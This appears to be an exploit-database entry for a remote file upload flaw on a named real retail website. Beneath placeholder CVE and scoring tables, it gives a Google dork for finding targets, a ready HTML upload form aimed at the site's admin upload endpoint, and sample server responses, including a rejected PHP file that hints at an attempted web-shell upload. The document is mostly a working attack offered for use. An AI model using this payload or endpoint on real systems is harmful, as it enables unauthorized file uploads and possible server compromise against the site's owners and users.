| CVE | Category | Price | Severity |
|---|---|---|---|
| CVE-XXXX-XXXX | CWE-XX | Unknown | High |

| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| Unknown | High | Remote | 2018-06-11 |

| CVSS | EPSS | EPSSP |
|---|---|---|
| CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 0.08746 | 0.78388 |
# Exploit Title: Makeupbarr Remote File Upload Vulnerability
# Google Dork: intext:Copyright Makeupbarr.Com
# Exploit Author: Mr.T959
# Author Website : http://mr-t959.xyz
# Tested on: Windows 7
--------------------------------------
# Exploit HTML Code :
<form method='post' target='_blank' action='https://www.makeupbarr.com/Admin/server/php/' enctype='multipart/form-data'>
<input type='file' name='files[]'><input type='submit' name='g' value='Upload Cok!'></form>

# Exploit
Admin/server/php/

# Successful
{"files":[{"name":"ecc4cebd847cd68e07746262fd8d2ec2.jpeg","size":5362,"type":"image\/jpeg","url":"https:\/\/www.makeupbarr.com\/Admin\/server\/php\/files\/ecc4cebd847cd68e07746262fd8d2ec2.jpeg"

# Error
{"files":[{"name":"geo.php","size":3468,"type":"application\/octet-stream","error":"Filetype not allowed"}]}

# Demo
https://www.makeupbarr.com/Admin/server/php/